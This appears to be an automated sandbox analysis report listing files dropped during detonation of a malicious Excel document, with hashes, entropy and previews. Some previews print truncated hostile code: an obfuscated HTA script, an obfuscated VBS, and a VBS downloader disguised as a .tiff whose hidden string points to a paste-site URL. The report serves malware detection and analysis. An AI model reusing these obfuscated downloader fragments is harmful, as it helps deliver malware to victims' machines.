                                                                                                                    Preview:%!Adobe-FontList 1.16.%Locale:0x80c..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1426595652.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1426595652.%EndFont..
                                                                                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                                    File Type:PostScript document text
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):536
                                                                                                                    Entropy (8bit):5.169975207806005
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12:T4RF0OidRuMgxg6dxs3yBFTtDcQAzidRuOPgxg601s3yBFDHpcR:kwOid8HxPs3yTTtyid8OPgx4s3yTDHk
                                                                                                                    MD5:B8D5CFADEFDDE17A6177F53C132EABA3
                                                                                                                    SHA1:1757EAA7D8F72C98FF9C23842A1C1A164B2F3C7A
                                                                                                                    SHA-256:02BAE4304F4B3FFC6524DF61E484E8C2290F667E367BE3CCDF2EDE3531C97CC3
                                                                                                                    SHA-512:FB1B1D3896F7CA63242DB377B6FF4E9A7F727A3BB9042C97347775963C95FD03481A4513A7D7F5AB71A39258ED2AF3A83B1925D68530975BEAA4FF1B7C67E941
                                                                                                                    Malicious:false
                                                                                                                    Preview:%!Adobe-FontList 1.16.%Locale:0x80c..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1426595652.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1426595652.%EndFont..
                                                                                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                                    File Type:PostScript document text
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):536
                                                                                                                    Entropy (8bit):5.169975207806005
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12:T4RF0OidRuMgxg6dxs3yBFTtDcQAzidRuOPgxg601s3yBFDHpcR:kwOid8HxPs3yTTtyid8OPgx4s3yTDHk
                                                                                                                    MD5:B8D5CFADEFDDE17A6177F53C132EABA3
                                                                                                                    SHA1:1757EAA7D8F72C98FF9C23842A1C1A164B2F3C7A
                                                                                                                    SHA-256:02BAE4304F4B3FFC6524DF61E484E8C2290F667E367BE3CCDF2EDE3531C97CC3
                                                                                                                    SHA-512:FB1B1D3896F7CA63242DB377B6FF4E9A7F727A3BB9042C97347775963C95FD03481A4513A7D7F5AB71A39258ED2AF3A83B1925D68530975BEAA4FF1B7C67E941
                                                                                                                    Malicious:false
                                                                                                                    Preview:%!Adobe-FontList 1.16.%Locale:0x80c..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1426595652.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1426595652.%EndFont..
                                                                                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                                    File Type:PostScript document text
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):9566
                                                                                                                    Entropy (8bit):5.225658272708332
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:0XA2P6Y6f76yx626OP6H6Q6y6nfs6ttRZ69tsu6jtG16RMX05F5yLk:0QAt0zvXkdvIfsutRZEtsuutG1gMknR
                                                                                                                    MD5:2E350FCDA512FFAFE08AE7B88E09374C
                                                                                                                    SHA1:DEB0E517C3170020C3A6AD13A901409B36167A86
                                                                                                                    SHA-256:3E28E24970A3E570728DBBED456D5A0061C2C823FDC31BD137B5C269F364C181
                                                                                                                    SHA-512:7841FC3DA6362AF2FDCB8151A7B8E7A2EA9954DEA7A459397513070A099776F46511948CC38A74B16AE902CDE302F19232089775884A2962693C101538CA8039
                                                                                                                    Malicious:false
                                                                                                                    Preview:%!Adobe-FontList 1.16.%Locale:0x80c..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1426595652.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1426595652.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:Type1.FontName:AdobePiStd.FamilyName:Adobe Pi Std.StyleName:Regular.FullName:Adobe Pi Std.MenuName:Adobe Pi Std.StyleBits:0.WritingScript:Roman.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\AdobePiStd.otf.DataFormat:sfntData.UsesStandardEncoding:yes.isCFF:yes.FileLength:92588.FileModTime:1426595650.WeightClass:400.WidthClass:5.AngleClass:0.DesignSize:240.NameArray:0,Mac,4,Adobe Pi Std.
                                                                                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                                    File Type:PostScript document text
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):9566
                                                                                                                    Entropy (8bit):5.225658272708332
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:0XA2P6Y6f76yx626OP6H6Q6y6nfs6ttRZ69tsu6jtG16RMX05F5yLk:0QAt0zvXkdvIfsutRZEtsuutG1gMknR
                                                                                                                    MD5:2E350FCDA512FFAFE08AE7B88E09374C
                                                                                                                    SHA1:DEB0E517C3170020C3A6AD13A901409B36167A86
                                                                                                                    SHA-256:3E28E24970A3E570728DBBED456D5A0061C2C823FDC31BD137B5C269F364C181
                                                                                                                    SHA-512:7841FC3DA6362AF2FDCB8151A7B8E7A2EA9954DEA7A459397513070A099776F46511948CC38A74B16AE902CDE302F19232089775884A2962693C101538CA8039
                                                                                                                    Malicious:false
                                                                                                                    Preview:%!Adobe-FontList 1.16.%Locale:0x80c..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1426595652.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1426595652.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:Type1.FontName:AdobePiStd.FamilyName:Adobe Pi Std.StyleName:Regular.FullName:Adobe Pi Std.MenuName:Adobe Pi Std.StyleBits:0.WritingScript:Roman.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\AdobePiStd.otf.DataFormat:sfntData.UsesStandardEncoding:yes.isCFF:yes.FileLength:92588.FileModTime:1426595650.WeightClass:400.WidthClass:5.AngleClass:0.DesignSize:240.NameArray:0,Mac,4,Adobe Pi Std.
                                                                                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):113096
                                                                                                                    Entropy (8bit):1.9807822014857486
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:384:hNzyk+spBXiosQUYuoB7OdnGbLq+AtKzZQ9D+v+WyXG1oJ/+OE1ckdcWMuZBKh1:n
                                                                                                                    MD5:3B8F1B6E5732868B048C91BCE2242936
                                                                                                                    SHA1:D70763DB636757EFEC1C6BA2EB0FB16D0E8052BC
                                                                                                                    SHA-256:893789B0A6331596EA36E905D166E020B7E1A2EB78C2A1189EFAF519D8DC2AE8
                                                                                                                    SHA-512:480BA9442E42639782BFBCF1EC0ACAA58CF59DFFAB3DEB1AB06C5F43A99003CCFEBA3BCEEA2BF7E69BCDE8D29391D6F86F8DAF19BC0E31F2BD6F39CEFB3F778A
                                                                                                                    Malicious:false
                                                                                                                    Preview:Adobe Acrobat Reader DC 19.0....?A12_SelectObject.................................................................................................................................................~~~@~~~ ........................................................................................~~~.~~~.~~~.....................................................................................~~~.~~~.~~~.~~~`................................................................................~~~.~~~.~~~.~~~.~~~`............................................................................~~~.~~~.~~~.~~~.~~~.~~~@........................................................................~~~.~~~.~~~.~~~.~~~.~~~.~~~0....................................................................~~~.~~~.~~~.~~~.~~~.~~~.~~~.~~~0................................................................~~~.~~~.~~~.~~~.~~~.~~~.~~~.~~~.~~~.............................................................~~~.~~~.~~~.~~~.~~~.~~~.~~~.~~~.~~~.~~
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):15189
                                                                                                                    Entropy (8bit):5.0343247648743
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:384:nWraVoGIpN6KQkj2Lkjh4iUxTnaVjvCnS/OdBmRWDf:nW+V3IpNBQkj2Oh4iUxDaVjvCnS/OdBD
                                                                                                                    MD5:7BC3FB6565E144A52C5F44408D5D80DF
                                                                                                                    SHA1:C3C443BF9F29EAA84B0A580FD5469F4C5CC57F77
                                                                                                                    SHA-256:EF6A75C051D70322EDCD5A89E6398CC00E3D860E87A0C7981310D30837CBA495
                                                                                                                    SHA-512:D0A936BAF2277884518EDF4729F88DA74C7BAA5BBB58C1060CE66DE92A23694EA993CA69D8820816C5D28182E9A38EE59DE821EE3A73F0D85DBBC74D406285A5
                                                                                                                    Malicious:false
                                                                                                                    Preview:PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script..........V.7...?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1........Import-IseSnippet........Get-IseSnippet........New-IseSnippet.........._.7...[...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSWorkflowUtility\
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:data
                                                                                                                    Category:modified
                                                                                                                    Size (bytes):64
                                                                                                                    Entropy (8bit):0.34726597513537405
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:Nlll:Nll
                                                                                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                    Malicious:false
                                                                                                                    Preview:@...e...........................................................
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:HTML document, ASCII text, with very long lines (65450), with CRLF line terminators
                                                                                                                    Category:modified
                                                                                                                    Size (bytes):83281
                                                                                                                    Entropy (8bit):2.463259789391332
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:tmbUZA+cT/RVeU2Dx6AyZ6LAuAHAbvOx7ze2pe2Ju2x4/mlpu6ae28RWHTuQBwxW:tD
                                                                                                                    MD5:76277AB4BDE108FED474724B88AD0E39
                                                                                                                    SHA1:F73BA378275E5BC2492E53B63C96C22F35599FFC
                                                                                                                    SHA-256:62DB7E02B51B89F767C5740BB8569668DDCF134B2865959D9FC7A749209D0539
                                                                                                                    SHA-512:7A914101C566FCF41B596CEAFDDE08674A979C9C20731D2E9A1DD0D58CF360204BCA82B4680FAA684806A5E7E4E88F285CB63BF414FD613878F7281CF60FC5A1
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_Obshtml, Description: Yara detected obfuscated html page, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\nicewithgreatfeaturesreturnformebestthingsgivensoofar[1].hta, Author: Joe Security
                                                                                                                    Preview:<Script Language='Javascript'>.. HTML Encryption provided by tufat.com -->.. ..document.write(unescape('%3C%53%63%72%69%70%74%20%4C%61%6E%67%75%61%67%65%3D%27%4A%61%76%61%73%63%72%69%70%74%27%3E%0A%3C%21%2D%2D%20%48%54%4D%4C%20%45%6E%63%72%79%70%74%69%6F%6E%20%70%72%6F%76%69%64%65%64%20%62%79%20%74%75%66%61%74%2E%63%6F%6D%20%2D%2D%3E%0A%3C%21%2D%2D%0A%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%27%25%33%43%25%32%31%25%34%34%25%34%46%25%34%33%25%35%34%25%35%39%25%35%30%25%34%35%25%32%30%25%36%38%25%37%34%25%36%44%25%36%43%25%33%45%25%30%41%25%33%43%25%36%44%25%36%35%25%37%34%25%36%31%25%32%30%25%36%38%25%37%34%25%37%34%25%37%30%25%32%44%25%36%35%25%37%31%25%37%35%25%36%39%25%37%36%25%33%44%25%32%32%25%35%38%25%32%44%25%35%35%25%34%31%25%32%44%25%34%33%25%36%46%25%36%44%25%37%30%25%36%31%25%37%34%25%36%39%25%36%32%25%36%43%25%36%35%25%32%32%25%32%30%25%36%33%25%36%46%25%36%45%25%37%34%25%36%35%25%36%45%25%37%34%25%33%44%25%32%32%25%34%39%25%34%35%25%33%
                                                                                                                    Process:C:\Windows\System32\wscript.exe
                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (3358), with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):79694
                                                                                                                    Entropy (8bit):5.554379657334594
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:qoSgAYHTLQ3OnRKRzI7f0oSgAYHTLQ3OnRKRzI7aoSgAYHTLQ3OnRKRzI7C:xFAYzL/RYwFAYzL/RYQFAYzL/RYx
                                                                                                                    MD5:F36EA4021BF4ED07112559BE10BA67B1
                                                                                                                    SHA1:91949A69D56929B133DD2E5001E66932C5FF7707
                                                                                                                    SHA-256:8E3C100F39A386639099EDF1D8B07C07DC28D3BA9E54345A7F6AD0647042AAD3
                                                                                                                    SHA-512:28344961EB0E4FBD183E8DC07EA35F6B23BA246A199BEF32E1AD85ADD47C47349AFA0541B8D0EC4ED6572B9A5FCC1AD8F7C143775E8DCA691582DF2EECC7119B
                                                                                                                    Malicious:false
                                                                                                                    Preview:.. ..ZhPiCcCcPNaziiL = "bkWfnkcLblptHaB"..ijcuNUuKCiNcWOP = "ltUGBzGouUzmWUK"..SKdemlZfbqBRKua = "KvuaKWPGmWoLcZx"....mKGWivlNPfGiALU = "KUqxhpBLtKmCKnR"..aNpLuOzbprimWWJ = "CmqNnKLdApLIcjx"..crUvtpLUgPWCWWN = "WchbvLcPmPZpnih"..iKpkKKpiPLCdixW = "eLUZeGGnWNHGtOG"..PZrBbGRmLCmcLxJ = "kLWWGhLPLCnWKmG"..WjlaWWALLLBeSWP = "LKGULLgaoUZoLZK"..WiedLfALWLoAbKn = "cKesGGWZoPpCucC"..LQkcZWWCbGLvUlf = "eUAzWcKuctCcLcR"..kLqxhtPhnvknbap = "UKWtniLJxLiWhGu"..fBWlotcLczLePPi = "iAzrhtbtezxtCsL"..muUiLmNrGkOCNcb = "LhmWdcubffhbWtd"..pWuGGnLLAeKiWTW = "IcuemgAfWKTNCIG"....JLLpqfuKtzikKeK = "iWPidNGLaKWWztL"..WhLdUliNKLedlCu = "QloZOWupGbeNCKa"..LConKosWRzKonpA = "LncPcKPOAPhjJfc"..HKtWQKWOPkeBdnB = "qSpKGoqioWfeLWW"..vBfpLWcWRqjaHWW = "BNpxdoWULvcPWqA"..fWdAscoKeKjcaPA = "KBWCmcdbmWWCTCL"..hiuniKeKBhZRUca = "lUknLdcchUWTani"..GPopKWAWcTNfeGA = "sIKPLKRLmThIKdi"..qPLazLkKWZWWiGr = "GRjtckNWcLecWek"....oKbxHeWppNqofcs = "LfscZobcCGLPZNm"..KnWpRaiAeJLfkNL = "ihKAbhoCxrPnTGC"..vWailLkKhbKkfjh = "RTffL
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with very long lines (559), with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1674
                                                                                                                    Entropy (8bit):4.529024305673106
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:48:VV++ywYw11yTwY+VNcowY1zgYI9A2l4X8fK:rzXicX8fK
                                                                                                                    MD5:A9DE1DD61052FB7164600306135B0771
                                                                                                                    SHA1:4EFEFAF03B42637E74817B4695FC086B2D95191E
                                                                                                                    SHA-256:BFBE88F62A33E1CD2289A9179DFE2151C9427C0CCD13753A029C3DCB78852FAE
                                                                                                                    SHA-512:9CE749FF8B7BB054B827534AFBD900A44E6AA03E8818D4CF9121CC9E8448EBC0A21CE641E6DB4D0824C14806CD34F8FEE301A523C338526CB9C5757E1547F6BD
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_VBS_Downloader_Generic, Description: Yara detected VBS Downloader Generic, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\verynicecreamychickenfvouratedishesforeveryonewhoinonlinewith[1].tiff, Author: Joe Security
                                                                                                                    Preview:..D.i.m. .k.a.t.c.i.n.a.,. .s.u.b.s.u.l.c.u.s.........k.a.t.c.i.n.a. .=. .".h.=...=...&.&{&=...=..=._..&=.V.y&=.G.=...=...=...t.=...=...&.&{&=...=..=._..&=.V.y&=.G.=...=...=...t.=...=...&.&{&=...=..=._..&=.V.y&=.G.=...=...=...p.=...=...&.&{&=...=..=._..&=.V.y&=.G.=...=...=...s.=...=...&.&{&=...=..=._..&=.V.y&=.G.=...=...=...:.=...=...&.&{&=...=..=._..&=.V.y&=.G.=...=...=.../.=...=...&.&{&=...=..=._..&=.V.y&=.G.=...=...=.../.=...=...&.&{&=...=..=._..&=.V.y&=.G.=...=...=...p.=...=...&.&{&=...=..=._..&=.V.y&=.G.=...=...=...a.=...=...&.&{&=...=..=._..&=.V.y&=.G.=...=...=...s.=...=...&.&{&=...=..=._..&=.V.y&=.G.=...=...=...t.=...=...&.&{&=...=..=._..&=.V.y&=.G.=...=...=...e.=...=...&.&{&=...=..=._..&=.V.y&=.G.=...=...=.....=...=...&.&{&=...=..=._..&=.V.y&=.G.=...=...=...r.=...=...&.&{&=...=..=._..&=.V.y&=.G.=...=...=...s.=...=...&.&{&=...=..=._..&=.V.y&=.G.=...=...=.../.=...=...&.&{&=...=..=._..&=.V.y&=.G.=...=...=...A.=...=...&.&{&=...=..=._..&=.V.y&=.G.
                                                                                                                    Process:C:\Windows\System32\wscript.exe
                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (3358), with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):79694
                                                                                                                    Entropy (8bit):5.554379657334594
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:qoSgAYHTLQ3OnRKRzI7f0oSgAYHTLQ3OnRKRzI7aoSgAYHTLQ3OnRKRzI7C:xFAYzL/RYwFAYzL/RYQFAYzL/RYx
                                                                                                                    MD5:F36EA4021BF4ED07112559BE10BA67B1
                                                                                                                    SHA1:91949A69D56929B133DD2E5001E66932C5FF7707
                                                                                                                    SHA-256:8E3C100F39A386639099EDF1D8B07C07DC28D3BA9E54345A7F6AD0647042AAD3
                                                                                                                    SHA-512:28344961EB0E4FBD183E8DC07EA35F6B23BA246A199BEF32E1AD85ADD47C47349AFA0541B8D0EC4ED6572B9A5FCC1AD8F7C143775E8DCA691582DF2EECC7119B
                                                                                                                    Malicious:false
                                                                                                                    Preview:.. ..ZhPiCcCcPNaziiL = "bkWfnkcLblptHaB"..ijcuNUuKCiNcWOP = "ltUGBzGouUzmWUK"..SKdemlZfbqBRKua = "KvuaKWPGmWoLcZx"....mKGWivlNPfGiALU = "KUqxhpBLtKmCKnR"..aNpLuOzbprimWWJ = "CmqNnKLdApLIcjx"..crUvtpLUgPWCWWN = "WchbvLcPmPZpnih"..iKpkKKpiPLCdixW = "eLUZeGGnWNHGtOG"..PZrBbGRmLCmcLxJ = "kLWWGhLPLCnWKmG"..WjlaWWALLLBeSWP = "LKGULLgaoUZoLZK"..WiedLfALWLoAbKn = "cKesGGWZoPpCucC"..LQkcZWWCbGLvUlf = "eUAzWcKuctCcLcR"..kLqxhtPhnvknbap = "UKWtniLJxLiWhGu"..fBWlotcLczLePPi = "iAzrhtbtezxtCsL"..muUiLmNrGkOCNcb = "LhmWdcubffhbWtd"..pWuGGnLLAeKiWTW = "IcuemgAfWKTNCIG"....JLLpqfuKtzikKeK = "iWPidNGLaKWWztL"..WhLdUliNKLedlCu = "QloZOWupGbeNCKa"..LConKosWRzKonpA = "LncPcKPOAPhjJfc"..HKtWQKWOPkeBdnB = "qSpKGoqioWfeLWW"..vBfpLWcWRqjaHWW = "BNpxdoWULvcPWqA"..fWdAscoKeKjcaPA = "KBWCmcdbmWWCTCL"..hiuniKeKBhZRUca = "lUknLdcchUWTani"..GPopKWAWcTNfeGA = "sIKPLKRLmThIKdi"..qPLazLkKWZWWiGr = "GRjtckNWcLecWek"....oKbxHeWppNqofcs = "LfscZobcCGLPZNm"..KnWpRaiAeJLfkNL = "ihKAbhoCxrPnTGC"..vWailLkKhbKkfjh = "RTffL
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1293620
                                                                                                                    Entropy (8bit):4.563127917199792
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:HepUelSAzNeNpVAZSedri2/Op4mD3f5ReZdZJElOFmkDrvwA2w4Meh/q4MmuRDrM:HepRlSPiS4ri2/lmzCJEuL1eU1muq
                                                                                                                    MD5:F71C973B5E362DFD6408D6C009E5643E
                                                                                                                    SHA1:24B3CE67B31BFD4791287932206D54C73489424E
                                                                                                                    SHA-256:27D0986B7EC233689490135118670F01325F21DFD6F60492AF5D62C7CF1E3045
                                                                                                                    SHA-512:4C3F506BC4313437C9194EED3CD5AB6616490AE376FC61DD38D8E00F975C41A23FC8D322E41CFBEC380F04F49ADF6E77A3B22BB5C96EBE714F5713B09838F1F4
                                                                                                                    Malicious:false
                                                                                                                    Preview:....l...........%...............@m..?... EMF....4....!..1...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3...'.......................%...........................................................L...d...v.../......._...v.../.......1...!..............?...........?................................L...d...................................!..............?...........?............................
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1452584
                                                                                                                    Entropy (8bit):0.2563079623293435
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12:Yal/m/4sHoKnL8n/Ml/+B0n/6iJJJKJJevhaJIJJTv192AriIIKqrR+d+Pg+rKXl:Yemb2sZb
                                                                                                                    MD5:F4B0E1C03C7BB160B48CFFA6160E2CBA
                                                                                                                    SHA1:3B95941606219C0EAF5FDB78E67C7F10BF21390B
                                                                                                                    SHA-256:06FD47AFCD865FAAEEF47C91837DFE45A7F0EC9F67E233767F9A7386B00326F0
                                                                                                                    SHA-512:F44D02569287398C2F97F3FD0F302E58DAA66C646EAC3E05DE5CD6965A3F0E2C9A5446A89B237CE622FD5583937BE137E0FBD09E3ABF5FC7ADBE834CCF52A65F
                                                                                                                    Malicious:false
                                                                                                                    Preview:....l...........b................*...7.. EMF....(*..........................8...X....................?...........................................*...7..........c.......Q...l)..........b.......................c.......P...(...x....(...... ....*...7..(...c................(..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):109544
                                                                                                                    Entropy (8bit):4.282675970330063
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:I4KlWqWxZiDQ4hHdCUeHxCDJB9Cnh3KCg0F9BV:I42WxF4MyeKCV
                                                                                                                    MD5:F7B9A8F20E64B2CB6B572BCBA5866236
                                                                                                                    SHA1:2F092A0A518639332BE76BF60DBB966AC331D356
                                                                                                                    SHA-256:72447B22A4BBC05B9E9183DF2ADB712AB51C3A45C6247C2303024197D1623F57
                                                                                                                    SHA-512:4A78624A9EB02208F3F30D03CC53EBE00BDD2C59E8F7719E35E706D51CD2F8D0D330BE6D6FAD2A9652536F888CB99E0CBE1E3B97A05EA65CB5914C37C501B728
                                                                                                                    Malicious:false
                                                                                                                    Preview:....l...............r............C...a.. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................s..."...........!...................................................s..."...........!...................................................s..."...........!...................................................s..."...........!...................................................s...'...............ZZZ.....%...................ZZZ.....................................L...d...............p...............q...!..............?...........?................................'...............2.......%...........(...................2...L...d.......p...............p.......
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):44256
                                                                                                                    Entropy (8bit):3.15066292565687
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:384:IhpMW5NFNimpUIuOjwTsiyGGiugBhUErpxTORe4tyIWY5:BWzi+8+GGidBhUErpxTORe4tyI9
                                                                                                                    MD5:F1EC2E98B0F577B675156B13DCF94105
                                                                                                                    SHA1:4FF2D02051E92771FBB245BA8095C80148A0F61A
                                                                                                                    SHA-256:66AFB9C12E20A08F9A713C366EDE8A9CD8F4A93B7D7BFC76205013C28A3250E9
                                                                                                                    SHA-512:6E442DB49BF2A429AD2CA7CB3804D79791C1E1FEB414F69FDDD58042E98C5AA5BFC1C751713DB76DD58DC9F3CAC3A7C491228797A909F8FD0291048E8F2FC9BE
                                                                                                                    Malicious:false
                                                                                                                    Preview:....l................................ .. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........................m...-...!..............?...........?................................R...p.................................. A.r.i.a.l...............................................
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1293620
                                                                                                                    Entropy (8bit):4.563127917199792
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:HepUelSAzNeNpVAZSedri2/Op4mD3f5ReZdZJElOFmkDrvwA2w4Meh/q4MmuRDrM:HepRlSPiS4ri2/lmzCJEuL1eU1muq
                                                                                                                    MD5:F71C973B5E362DFD6408D6C009E5643E
                                                                                                                    SHA1:24B3CE67B31BFD4791287932206D54C73489424E
                                                                                                                    SHA-256:27D0986B7EC233689490135118670F01325F21DFD6F60492AF5D62C7CF1E3045
                                                                                                                    SHA-512:4C3F506BC4313437C9194EED3CD5AB6616490AE376FC61DD38D8E00F975C41A23FC8D322E41CFBEC380F04F49ADF6E77A3B22BB5C96EBE714F5713B09838F1F4
                                                                                                                    Malicious:false
